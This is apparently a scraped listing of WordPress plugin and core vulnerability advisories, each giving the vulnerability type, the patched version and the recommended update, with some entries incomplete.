Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Loginizer

Vulnerability: Reflected Cross-Site Scripting via ‘name’
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Hot Linked Image Cacher

Plugin: WooCommerce Advanced Bulk Edit Products, Orders, Coupons, Any WordPress Post Type – Smart Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Webmaster Tools

Vulnerability: Cross-Site Request Forgery vin lionscripts_plg_f
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: yolink Search for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 4.1.4
Recommended Action: Update to version 4.1.4, or a newer patched version

Plugin: Sell Media

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Advanced uploader

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Shoppable Images

Vulnerability: Missing Authorization
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.3.23
Recommended Action: Update to version 1.2.3.23, or a newer patched version

Plugin: Fudousan Plugin

Plugin: WP Job Board

Vulnerability: Reflected Cross-Site Scripting & Cross-Frame Scripting
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: CLUEVO LMS, E-Learning Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.0
Recommended Action: Update to version 1.11.0, or a newer patched version

Plugin: Sort SearchResult By Title

Vulnerability: Cross-Site Request Forgery via settings_page
Patched Version: 11.0
Recommended Action: Update to version 11.0, or a newer patched version

Plugin: Portfolio by BestWebSoft – Work and Projects Presentation Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Social Media Feather | social media sharing

Vulnerability: Missing Authorization
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Frontend Post WordPress Plugin – AccessPress Anonymous Post

Vulnerability: Backdoored
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Random Banner

Vulnerability: Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: kbslider

Plugin: SureCart – Ecommerce Made Easy For Selling Physical Products, Digital Downloads, Subscriptions, Donations, & Payments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Request Forgery via views/tools/diagnostics/information.php
Patched Version: 1.5.7.1
Recommended Action: Update to version 1.5.7.1, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.4.1
Recommended Action: Update to version 3.0.4.1, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated (Administrator+) Directory Traversal to Arbitrary File Read
Patched Version: 5.6.24
Recommended Action: Update to version 5.6.24, or a newer patched version

Plugin: Advanced Shipment Tracking for WooCommerce

Vulnerability: Authenticated WordPress Options Change
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Missing Authorization to Course Category Creation
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Image URl
Patched Version: 5.9.5
Recommended Action: Update to version 5.9.5, or a newer patched version

Plugin: AMP+ Plus

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Account Changes
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Cross Site Scripting via post_title parameter
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 7.0.6.2
Recommended Action: Update to version 7.0.6.2, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Missing Authorization to Transients Deletion
Patched Version: 7.33
Recommended Action: Update to version 7.33, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Arbitrary Post Deletion via Cross-Site Request Forgery
Patched Version: 4.3.25
Recommended Action: Update to version 4.3.25, or a newer patched version

Plugin: ENL Newsletter

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Authenticated Access or Cross-Site Request Forgery leading to SQL Injection via orderby, order Parameters
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Maps by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: HTML5 AV Manager

Plugin: Amazonify

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 1.9.13
Recommended Action: Update to version 1.9.13, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.49
Recommended Action: Update to version 3.2.49, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: 5.6.1 Authentication Bypass and Privilege Escalation
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Cross-Site Request Forgery via Multiple AJAX Actions
Patched Version: 121
Recommended Action: Update to version 121, or a newer patched version

Plugin: Social Share Boost

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: HTML5 MP3 Player with Playlist Free

Vulnerability: Full Path Disclosure
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Mingle Forum

Vulnerability: SQL Injection
Patched Version: 1.0.33
Recommended Action: Update to version 1.0.33, or a newer patched version

Plugin: Dynamic Word Spinner: CSS3 Animated Rotation

Vulnerability: Missing Authorization via save_admin_options
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.77.3
Recommended Action: Update to version 2.0.77.3, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.88.15
Recommended Action: Update to version 2.88.15, or a newer patched version

Plugin: Category Specific RSS feed Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Shortcode-Based Cross-Site Scripting
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: PHP Compatibility Checker

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Gallery – Photo Albums Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.50
Recommended Action: Update to version 1.3.50, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload via Path Traversal
Patched Version: 3.6.9
Recommended Action: Update to version 3.6.9, or a newer patched version

Plugin: CBX Bookmark & Favorite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: User Activity Tracking and Log

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: Better Delete Revision

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Unauthenticated Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: Bulk Comment Remove

Vulnerability: Cross-Site Request Forgery via brc_admin()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Prevent Landscape Rotation

Vulnerability: Cross-Site Request Forgery via adminpage.php
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: MemberSonic Lite Membership Site Plugin

Vulnerability: Authentication Bypass
Patched Version: 1.302
Recommended Action: Update to version 1.302, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.19
Recommended Action: Update to version 2.0.19, or a newer patched version

Plugin: flickr-picture-backup

Vulnerability: Arbitrary file upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Min Max Control – Min Max Quantity & Step Control for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: BookX

Plugin: Store Locator WordPress

Vulnerability: Reflected Cross-Site Scripting via ‘asl-nounce’
Patched Version: 1.4.13
Recommended Action: Update to version 1.4.13, or a newer patched version

Plugin: WordPress Spreadsheet

Plugin: Konnichiwa! Membership

Plugin: WordPress Multisite Content Copier/Updater

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: IMPress for IDX Broker

Vulnerability: Authenticated Arbitrary Post Creation, Modification, and Deletion
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Featured Image from URL (FIFU)

Vulnerability: Missing Authorization on REST API routes
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Advanced Woo Search

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.78
Recommended Action: Update to version 2.78, or a newer patched version

Plugin: WooCommerce

Vulnerability: Insecure Direct Object Reference via order_id Parameter
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Registration | User Registration and Invitation Codes Plugin for WordPress

Vulnerability: PHP Object Injection
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Contest Gallery Pro

Vulnerability: Authenticated (Administrator+) SQL Injection via wp_user_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Missing Authorization via fire_cron REST endpoint
Patched Version: 1.24.7
Recommended Action: Update to version 1.24.7, or a newer patched version

Plugin: Pixel Cat – Conversion Pixel Manager

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting via Global Variables
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: SpiderCalendar

Vulnerability: SQL Injection
Patched Version: 1.5.52
Recommended Action: Update to version 1.5.52, or a newer patched version

Plugin: Debug Assistant

Vulnerability: Cross-Site Request Forgery via imlt_create_admin
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: MainWP Post Dripper Extension

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: FareHarbor for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.9.25
Recommended Action: Update to version 1.9.25, or a newer patched version

Plugin: Floating Action Button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Clicky by Yoast

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.9.8
Recommended Action: Update to version 2.9.8, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Comments via URLs
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Easy Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Prismatic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Auto-hyperlink URLs

Vulnerability: Tab Nabbing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 13.2.6
Recommended Action: Update to version 13.2.6, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: wordTube

Vulnerability: Remote File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Easy Hide Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: FoxyPress

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Event Calendar – Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Movies

Plugin: Customer Reviews for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Core: WordPress

Plugin: Form Builder | Create Responsive Contact Forms

Vulnerability: Unauthenticated CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: St-Daily-Tip

Plugin: WP-Chatbot for Messenger

Vulnerability: Missing Authorization
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: HTTP Auth

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Authenticated (Subscriber+) SQL Injection via Export
Patched Version: 1.2.90
Recommended Action: Update to version 1.2.90, or a newer patched version

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP Header Images

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: UserAgent-Spy

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Memory Usage, Memory Limit, PHP and Server Memory Health Check and Provide Suggestions

Vulnerability: Missing Authorization to Arbitrary Plugin Installation
Patched Version: 2.46
Recommended Action: Update to version 2.46, or a newer patched version

Plugin: WP Blog and Widgets

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: ALD – Dropshipping and Fulfillment for AliExpress and WooCommerce

Vulnerability: Cross-Site Request Forgery to Order Information Disclosure
Patched Version: 1.0.22
Recommended Action: Update to version 1.0.22, or a newer patched version

Plugin: Hana Flv Player

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: Highlight Sitewide Notice, Text, Button Menu

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.9.3
Recommended Action: Update to version 0.9.3, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Content Audit

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Husker Portfolio

Plugin: ipBlockList

Vulnerability: Cross Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.4.0
Recommended Action: Update to version 8.4.0, or a newer patched version

Plugin: Product Slider for WooCommerce by PickPlugins

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.13.42
Recommended Action: Update to version 1.13.42, or a newer patched version

Plugin: WP Repost

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scritping
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BZScore – Live Score

Plugin: Shortcode Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Faculty Staff and Student Directory Plugin – Campus Directory

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: SQL Injection
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Easy Digital Downloads – PDF stamper

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting in Various Blocks
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Core: WordPress

Vulnerability: Authenticated Information Disclosure via REST-API
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Contact Form DB – Elementor

Vulnerability: Elementor <= 1.7
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Easy Registration Forms

Plugin: Profile Extra Fields by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery on ajax_save_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Authenticated (Subscriber+) Path Traversal to Arbitrary File Deletion
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via Long Password
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Simple Event Planner

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Form Settings
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: Easy Org Chart

Plugin: Floating Social Media Links

Vulnerability: Remote File Inclusion via fsml-hideshow.js.php wpp parameter
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Duplicate Page

Vulnerability: No subtitle
Patched Version: 4.4.2
Recommended Action: Update to version 4.4.2, or a newer patched version

Plugin: Flickr Justified Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Contact Form Builder, Contact Widget

Plugin: Lazy Social Comments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Options
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Sensitive Data Exposure
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: Sociable

Plugin: WP All Export Pro

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: WC Sales Notification

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: CSV Injection
Patched Version: 3.3.14
Recommended Action: Update to version 3.3.14, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Missing Authorization
Patched Version: 1.14.8
Recommended Action: Update to version 1.14.8, or a newer patched version

Plugin: YourMembership Single Sign On – YM SSO Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: LayerSlider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.7.10
Recommended Action: Update to version 7.7.10, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Social Feed Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: WP CSV Exporter

Vulnerability: CSV Injection
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: MainWP UpdraftPlus Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: CPT Bootstrap Carousel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.13
Recommended Action: Update to version 1.13, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Authenticated (Admin+) SQL Injection via $email value
Patched Version: 9.9.4
Recommended Action: Update to version 9.9.4, or a newer patched version

Plugin: Timed Content

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.73
Recommended Action: Update to version 2.73, or a newer patched version

Plugin: WP Membership

Plugin: Qode Essential Addons

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Kit (formerly ConvertKit) – Email Newsletter, Email Marketing, Subscribers and Landing Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: wp-unique-article-header-image

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 10.0.2
Recommended Action: Update to version 10.0.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: History Timeline for Biography, Company History & Event Timeline

Plugin: Woocommerce Vietnam Checkout

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.9.50
Recommended Action: Update to version 4.9.50, or a newer patched version

Plugin: surveys

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.1.3.1
Recommended Action: Update to version 4.1.3.1, or a newer patched version

Plugin: Media Library Categories

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: WP Page Numbers

Vulnerability: Cross-Site Request Forgery via wp_page_numbers_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clone

Vulnerability: Sensitive Information Exposure
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Google +1 by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

